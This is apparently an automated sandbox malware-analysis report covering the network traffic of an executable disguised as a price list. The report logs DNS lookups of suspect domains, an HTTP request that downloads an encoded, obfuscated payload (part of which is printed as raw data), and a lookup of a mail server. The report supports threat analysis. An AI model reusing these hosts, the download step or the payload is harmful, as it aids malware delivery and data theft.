                                                Feb 23, 2021 09:58:25.222950935 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.223215103 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.224092960 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.225575924 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.225600958 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.225620985 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.225817919 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.225836992 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.225897074 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.225917101 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.226289034 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.226330042 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.226346970 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.227082968 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.227113962 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.227160931 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.227179050 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.227885008 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.228080034 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.228168964 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.228617907 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.228648901 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.228718042 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.229448080 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.229480028 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.229563951 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.230184078 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.230216026 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.230998039 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.231029987 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.231089115 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.231132984 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.231765032 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.231798887 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.231858015 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.232557058 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.232584953 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.232696056 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.233326912 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.233350039 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.233439922 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.234118938 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.234138012 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.234214067 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.234863997 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.234880924 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.234967947 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.235631943 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.235650063 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.235723019 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.236409903 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.236428022 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.236546040 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.237195969 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.237214088 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.237301111 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.237982035 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.237999916 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.238078117 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.238969088 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.238996983 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.239101887 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.263546944 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.263578892 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.263755083 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.263806105 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.263828039 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.263930082 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.279237032 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.279274940 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.279434919 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:25.279522896 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:25.321470976 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:46.940013885 CET4971180192.168.2.6104.21.71.230

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 23, 2021 09:58:01.779805899 CET4928353192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:01.843063116 CET53492838.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:01.858932018 CET5837753192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:01.907627106 CET53583778.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:02.252226114 CET5507453192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:02.300759077 CET53550748.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:02.514226913 CET5451353192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:02.562886000 CET53545138.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:05.151606083 CET6204453192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:05.210381031 CET53620448.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:06.165865898 CET6379153192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:06.226519108 CET53637918.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:07.370243073 CET6426753192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:07.418992996 CET53642678.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:09.609307051 CET4944853192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:09.661053896 CET53494488.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:11.400343895 CET6034253192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:11.460376024 CET53603428.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:15.664323092 CET6134653192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:15.713074923 CET53613468.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:25.772893906 CET5177453192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:25.821585894 CET53517748.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:26.719842911 CET5602353192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:26.768448114 CET53560238.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:27.863992929 CET5838453192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:27.915503979 CET53583848.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:39.916248083 CET6026153192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:39.967736006 CET53602618.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:47.694259882 CET5606153192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:47.751365900 CET53560618.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:53.494467020 CET5833653192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:53.546283960 CET53583368.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:57.324836969 CET5378153192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:57.384803057 CET53537818.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:57.477883101 CET5406453192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:57.535003901 CET53540648.8.8.8192.168.2.6
                                                Feb 23, 2021 09:58:59.350963116 CET5281153192.168.2.68.8.8.8
                                                Feb 23, 2021 09:58:59.400434017 CET53528118.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:09.894043922 CET5529953192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:09.956212044 CET53552998.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:10.642409086 CET6374553192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:10.691104889 CET53637458.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:11.503909111 CET5005553192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:11.563760996 CET53500558.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:12.038431883 CET6137453192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:12.140125990 CET53613748.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:12.340500116 CET5033953192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:12.408098936 CET53503398.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:12.624511003 CET6330753192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:12.681485891 CET53633078.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:13.294652939 CET4969453192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:13.346338034 CET53496948.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:13.992314100 CET5498253192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:14.049511909 CET53549828.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:14.972235918 CET5001053192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:15.021028996 CET53500108.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:15.320014000 CET6371853192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:15.378712893 CET53637188.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:16.450285912 CET6211653192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:16.507816076 CET53621168.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:16.974112034 CET6381653192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:17.031265974 CET53638168.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:26.311815023 CET5501453192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:26.361990929 CET53550148.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:31.116597891 CET6220853192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:31.176487923 CET53622088.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:32.589982986 CET5757453192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:32.641614914 CET53575748.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:33.738806009 CET5181853192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:33.787566900 CET53518188.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:34.745445013 CET5662853192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:34.796977997 CET53566288.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:36.042706966 CET6077853192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:36.093416929 CET53607788.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:37.325345993 CET5379953192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:37.374044895 CET53537998.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:38.615228891 CET5468353192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:38.667155027 CET53546838.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:39.334280014 CET5932953192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:39.392852068 CET53593298.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:41.642321110 CET6402153192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:41.691236973 CET53640218.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:45.811018944 CET5612953192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:45.883150101 CET53561298.8.8.8192.168.2.6
                                                Feb 23, 2021 09:59:48.978224039 CET5817753192.168.2.68.8.8.8
                                                Feb 23, 2021 09:59:49.029850006 CET53581778.8.8.8192.168.2.6
                                                Feb 23, 2021 10:00:05.907835007 CET5070053192.168.2.68.8.8.8
                                                Feb 23, 2021 10:00:05.956501961 CET53507008.8.8.8192.168.2.6
                                                Feb 23, 2021 10:00:17.463215113 CET5406953192.168.2.68.8.8.8
                                                Feb 23, 2021 10:00:17.531023026 CET53540698.8.8.8192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Feb 23, 2021 09:58:11.400343895 CET192.168.2.68.8.8.80xcc4bStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                Feb 23, 2021 10:00:17.463215113 CET192.168.2.68.8.8.80x8f5dStandard query (0)mail.electrobelarmino.ptA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Feb 23, 2021 09:58:11.460376024 CET8.8.8.8192.168.2.60xcc4bNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                Feb 23, 2021 09:58:11.460376024 CET8.8.8.8192.168.2.60xcc4bNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                Feb 23, 2021 10:00:17.531023026 CET8.8.8.8192.168.2.60x8f5dNo error (0)mail.electrobelarmino.pt109.71.43.243A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • coroloboxorozor.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.649711104.21.71.23080C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 23, 2021 09:58:11.550564051 CET1090OUTGET /base/FBD1AA88F2DB3E5E79F7212492E97FE4.html HTTP/1.1
                                                Host: coroloboxorozor.com
                                                Connection: Keep-Alive
                                                Feb 23, 2021 09:58:11.669672012 CET1092INHTTP/1.1 200 OK
                                                Date: Tue, 23 Feb 2021 08:58:11 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Set-Cookie: __cfduid=d9f146432d691f502a99c6af0b59c5ad41614070691; expires=Thu, 25-Mar-21 08:58:11 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                Last-Modified: Mon, 22 Feb 2021 22:31:52 GMT
                                                Vary: Accept-Encoding
                                                X-Frame-Options: SAMEORIGIN
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 086fb54f0400004c91ce8ce000000001
                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bT5dh5XRbuDUZZ0Vs%2F6zo3dmicm5%2B%2BuvU76ejQkzUdOReaWiTUY8L%2F36nBo9SflV30a2je6zBp56jL8MAZLxqF7hoiknK4gJ1LQ3a6TjPhSRsU4y"}],"max_age":604800}
                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 625fbe5e680f4c91-AMS
                                                Data Raw: 37 63 39 33 0d 0a 3c 70 3e 48 48 52 4a 46 52 6b 6e 6e 52 46 52 57 52 46 52 46 52 46 52 6e 52 46 52 46 52 46 52 6d 67 67 52 6d 67 67 52 46 52 46 52 6b 72 6e 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 56 6e 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 6b 6d 72 52 46 52 46 52 46 52 6b 6e 52 57 6b 52 6b 72 56 52 6b 6e 52 46 52 6b 72 46 52 4a 52 6d 46 67 52 57 57 52 6b 72 6e 52 6b 52 48 56 52 6d 46 67 52 57 57 52 72 6e 52 6b 46 6e 52 6b 46 67 52 6b 6b 67 52 57 6d 52 6b 6b 6d 52 6b 6b 6e 52 6b 6b 6b 52 6b 46 57 52 6b 6b 6e 52 4a 48 52 6b 46 4a 52 57 6d 52 4a 4a 52 4a 48 52 6b 6b 46 52 6b 6b 46 52 6b 6b 6b 52 6b 6b 56 52 57 6d 52 4a 72 52 6b 46 6b 52 57 6d 52 6b 6b 6e 52 6b 6b 48 52 6b 6b 46 52 57 6d 52 6b 46 67 52 6b 6b 46 52 57 6d 52 56 72 52 48 4a 52 72 57 52 57 6d 52 6b 46 4a 52 6b 6b 6b 52 6b 46 46 52 6b 46 6b 52 6e 56 52 6b 57 52 6b 57 52 6b 46 52 57 56 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 72 46 52 56 4a 52 46 52 46 52 48 56 52 6b 52 57 52 46 52 48 56 52 6b 6e 6d 52 6e 6b 52 6b 72 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 6d 6d 6e 52 46 52 57 6e 52 46 52 6b 6b 52 6b 52 72 46 52 46 52 46 52 4a 72 52 6e 52 46 52 46 52 56 52 46 52 46 52 46 52 46 52 46 52 46 52 6d 46 56 52 6b 6d 4a 52 6e 52 46 52 46 52 57 6d 52 46 52 46 52 46 52 6b 56 46 52 6e 52 46 52 46 52 46 52 46 52 6b 6d 72 52 46 52 57 6d 52 46 52 46 52 46 52 6d 52 46 52 46 52 6e 52 46 52 46 52 46 52 46 52 46 52 46 52 46 52 6e 52 46 52 46 52 46 52 46
                                                Data Ascii: 7c93<p>HHRJFRknnRFRWRFRFRFRnRFRFRFRmggRmggRFRFRkrnRFRFRFRFRFRFRFRVnRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRkmrRFRFRFRknRWkRkrVRknRFRkrFRJRmFgRWWRkrnRkRHVRmFgRWWRrnRkFnRkFgRkkgRWmRkkmRkknRkkkRkFWRkknRJHRkFJRWmRJJRJHRkkFRkkFRkkkRkkVRWmRJrRkFkRWmRkknRkkHRkkFRWmRkFgRkkFRWmRVrRHJRrWRWmRkFJRkkkRkFFRkFkRnVRkWRkWRkFRWVRFRFRFRFRFRFRFRrFRVJRFRFRHVRkRWRFRHVRknmRnkRkrFRFRFRFRFRFRFRFRFRmmnRFRWnRFRkkRkRrFRFRFRJrRnRFRFRVRFRFRFRFRFRFRmFVRkmJRnRFRFRWmRFRFRFRkVFRnRFRFRFRFRkmrRFRWmRFRFRFRmRFRFRnRFRFRFRFRFRFRFRnRFRFRFRF
                                                Feb 23, 2021 09:58:11.669734001 CET1093INData Raw: 52 46 52 46 52 46 52 46 52 6d 6d 6e 52 6e 52 46 52 46 52 6d 52 46 52 46 52 46 52 46 52 46 52 46 52 6d 52 46 52 56 6e 52 6b 57 57 52 46 52 46 52 6b 56 52 46 52 46 52 6b 56 52 46 52 46 52 46 52 46 52 6b 56 52 46 52 46 52 6b 56 52 46 52 46 52 46 52
                                                Data Ascii: RFRFRFRFRmmnRnRFRFRmRFRFRFRFRFRFRmRFRVnRkWWRFRFRkVRFRFRkVRFRFRFRFRkVRFRFRkVRFRFRFRFRFRFRkVRFRFRFRFRFRFRFRFRFRFRFRkkVRkmJRnRFRrHRFRFRFRFRkVFRnRFRkWVRWRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRkJmRnRFRkmRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFRFR
                                                Feb 23, 2021 09:58:11.669766903 CET1095INData Raw: 6b 56 56 52 6b 6b 67 52 57 6e 52 46 52 46 52 6b 46 52 6b 6d 72 52 6b 52 46 52 46 52 6e 52 6b 6b 67 52 57 67 52 46 52 46 52 6b 46 52 6b 6d 72 52 6d 52 46 52 46 52 6e 52 6b 6b 67 52 57 56 52 46 52 46 52 6b 46 52 6b 6d 72 52 57 52 46 52 46 52 6e 52
                                                Data Ascii: kVVRkkgRWnRFRFRkFRkmrRkRFRFRnRkkgRWgRFRFRkFRkmrRmRFRFRnRkkgRWVRFRFRkFRkmrRWRFRFRnRkkgRWHRFRFRkFRkmrRnRFRFRnRnmRWrRFRWRmgnRmkRHRFRFRmHRnmRWrRFRmRnFRnrRFRFRkFRFRnmRrmRFRmRnFRnrRFRFRkFRFRmRkkgRgmRFRFRkFRkmgRnJRFRFRkFRnmRWnRFRmRkmrRHRFRFRnRnmRrVRk
                                                Feb 23, 2021 09:58:11.669791937 CET1096INData Raw: 6b 6d 52 6d 67 6e 52 6b 6e 52 6b 52 46 52 6b 6b 6e 52 56 48 52 46 52 46 52 6b 6b 6d 52 6d 67 6e 52 6b 6e 52 6d 52 46 52 6b 6b 67 52 6d 6b 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6e 52 57 52 46 52 6d 67 6e 52 6b 6d 52 6b 52 46 52 6e 46 52 6b 52 46
                                                Data Ascii: kmRmgnRknRkRFRkknRVHRFRFRkkmRmgnRknRmRFRkkgRmkRFRFRkFRmgnRknRWRFRmgnRkmRkRFRnFRkRFRFRnWRkkkRmWRFRFRkFRmgnRknRnRFRgVRgVRFRFRFRmgnRkWRnRFRnFRmnRFRFRkFRmgnRknRgRFRmgnRkmRgRFRnFRmgRFRFRkFRmgnRkmRmRFRnFRmVRFRFRkFRmkrRmgnRknRVRFRmgnRkmRWRFRmgnRkmRVR
                                                Feb 23, 2021 09:58:11.669819117 CET1097INData Raw: 52 6b 6d 52 56 52 46 52 6e 46 52 6d 48 52 46 52 46 52 6b 46 52 6b 6b 6b 52 6d 72 52 46 52 46 52 6b 46 52 57 72 52 46 52 6d 67 6e 52 6b 57 52 6e 52 46 52 6e 46 52 6d 4a 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6e 52 48 52 46 52 6d 67 6e 52 6b 6d 52
                                                Data Ascii: RkmRVRFRnFRmHRFRFRkFRkkkRmrRFRFRkFRWrRFRmgnRkWRnRFRnFRmJRFRFRkFRmgnRknRHRFRmgnRkmRHRFRgrRkHrRmggRmggRmggRmmkRkHRFRFRFRmgnRkWRnRFRmgnRmmRmRFRFRmHRkkkRWFRFRFRkFRFRmmFRmgnRkmRWRFRkkkRWkRFRFRkFRmgnRknRFRFRgVRFRFRFRFRmgnRkmRFRFRnmRFRFRkRkVRFRFRmRFR
                                                Feb 23, 2021 09:58:11.669847965 CET1099INData Raw: 46 52 6d 52 46 52 6d 72 52 46 52 6b 46 56 52 6b 57 6e 52 46 52 6b 48 52 46 52 46 52 46 52 46 52 6d 48 52 6e 72 52 6d 52 46 52 6b 48 6e 52 46 52 46 52 46 52 6b 52 46 52 46 52 6b 48 52 46 52 6b 6b 6e 52 6d 48 52 6b 52 46 52 6b 6b 6d 52 6d 67 6e 52
                                                Data Ascii: FRmRFRmrRFRkFVRkWnRFRkHRFRFRFRFRmHRnrRmRFRkHnRFRFRFRkRFRFRkHRFRkknRmHRkRFRkkmRmgnRknRkRFRkknRVgRkRFRkkmRmgnRknRmRFRkkgRmkRFRFRkFRmgnRknRWRFRmgnRkmRkRFRnFRkRFRFRnWRkkkRmWRFRFRkFRmgnRknRnRFRgVRgVRFRFRFRmgnRkWRnRFRnFRmnRFRFRkFRmgnRknRgRFRmgnRkmRg
                                                Feb 23, 2021 09:58:11.669874907 CET1100INData Raw: 6e 52 6b 6d 52 67 52 46 52 6e 46 52 6d 67 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6d 52 6d 52 46 52 6e 46 52 6d 56 52 46 52 46 52 6b 46 52 6d 6b 72 52 6d 67 6e 52 6b 6e 52 56 52 46 52 6d 67 6e 52 6b 6d 52 57 52 46 52 6d 67 6e 52 6b 6d 52 56 52 46
                                                Data Ascii: nRkmRgRFRnFRmgRFRFRkFRmgnRkmRmRFRnFRmVRFRFRkFRmkrRmgnRknRVRFRmgnRkmRWRFRmgnRkmRVRFRnFRmHRFRFRkFRkkkRmrRFRFRkFRWrRFRmgnRkWRnRFRnFRmJRFRFRkFRmgnRknRHRFRmgnRkmRHRFRgrRkHrRmggRmggRmggRmmkRkHRFRFRFRmgnRkWRnRFRmgnRmmRmRFRFRmHRkkkRWFRFRFRkFRFRmmFRmgn
                                                Feb 23, 2021 09:58:11.669902086 CET1102INData Raw: 6d 6d 46 52 6d 67 6e 52 6b 6d 52 57 52 46 52 6b 6b 6b 52 57 6b 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6e 52 46 52 46 52 67 56 52 46 52 46 52 46 52 46 52 6d 67 6e 52 6b 6d 52 46 52 46 52 6e 6d 52 46 52 46 52 6b 52 6b 56 52 46 52 46 52 6d 52 46 52
                                                Data Ascii: mmFRmgnRkmRWRFRkkkRWkRFRFRkFRmgnRknRFRFRgVRFRFRFRFRmgnRkmRFRFRnmRFRFRkRkVRFRFRmRFRmrRFRkFVRkWnRFRkHRFRFRFRFRmHRnrRmRFRkHnRFRFRFRkRFRFRkHRFRkknRJRmRFRkkmRmgnRknRkRFRkknRmgRmRFRkkmRmgnRknRmRFRkkgRmkRFRFRkFRmgnRknRWRFRmgnRkmRkRFRnFRkRFRFRnWRkkkRm
                                                Feb 23, 2021 09:58:11.669926882 CET1103INData Raw: 6b 6b 52 6d 57 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6e 52 6e 52 46 52 67 56 52 67 56 52 46 52 46 52 46 52 6d 67 6e 52 6b 57 52 6e 52 46 52 6e 46 52 6d 6e 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6e 52 67 52 46 52 6d 67 6e 52 6b 6d 52 67 52 46 52
                                                Data Ascii: kkRmWRFRFRkFRmgnRknRnRFRgVRgVRFRFRFRmgnRkWRnRFRnFRmnRFRFRkFRmgnRknRgRFRmgnRkmRgRFRnFRmgRFRFRkFRmgnRkmRmRFRnFRmVRFRFRkFRmkrRmgnRknRVRFRmgnRkmRWRFRmgnRkmRVRFRnFRmHRFRFRkFRkkkRmrRFRFRkFRWrRFRmgnRkWRnRFRnFRmJRFRFRkFRmgnRknRHRFRmgnRkmRHRFRgrRkHrRmg
                                                Feb 23, 2021 09:58:11.669956923 CET1104INData Raw: 52 6b 48 72 52 6d 67 67 52 6d 67 67 52 6d 67 67 52 6d 6d 6b 52 6b 48 52 46 52 46 52 46 52 6d 67 6e 52 6b 57 52 6e 52 46 52 6d 67 6e 52 6d 6d 52 6d 52 46 52 46 52 6d 48 52 6b 6b 6b 52 57 46 52 46 52 46 52 6b 46 52 46 52 6d 6d 46 52 6d 67 6e 52 6b
                                                Data Ascii: RkHrRmggRmggRmggRmmkRkHRFRFRFRmgnRkWRnRFRmgnRmmRmRFRFRmHRkkkRWFRFRFRkFRFRmmFRmgnRkmRWRFRkkkRWkRFRFRkFRmgnRknRFRFRgVRFRFRFRFRmgnRkmRFRFRnmRFRFRkRkVRFRFRmRFRmrRFRkFVRkWnRFRkHRFRFRFRFRmHRnrRmRFRkHnRFRFRFRkRFRFRkHRFRkknRmFgRmRFRkkmRmgnRknRkRFRkknR
                                                Feb 23, 2021 09:58:11.670891047 CET1106INData Raw: 52 6b 6b 6e 52 56 4a 52 57 52 46 52 6b 6b 6d 52 6d 67 6e 52 6b 6e 52 6d 52 46 52 6b 6b 67 52 6d 6b 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6e 52 57 52 46 52 6d 67 6e 52 6b 6d 52 6b 52 46 52 6e 46 52 6b 52 46 52 46 52 6e 57 52 6b 6b 6b 52 6d 57 52
                                                Data Ascii: RkknRVJRWRFRkkmRmgnRknRmRFRkkgRmkRFRFRkFRmgnRknRWRFRmgnRkmRkRFRnFRkRFRFRnWRkkkRmWRFRFRkFRmgnRknRnRFRgVRgVRFRFRFRmgnRkWRnRFRnFRmnRFRFRkFRmgnRknRgRFRmgnRkmRgRFRnFRmgRFRFRkFRmgnRkmRmRFRnFRmVRFRFRkFRmkrRmgnRknRVRFRmgnRkmRWRFRmgnRkmRVRFRnFRmHRFRFRk


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: PRICE LIST (NOVEMBER 2020).exe PID: 7024 Parent PID: 5892

                                                General

                                                Start time:09:58:10
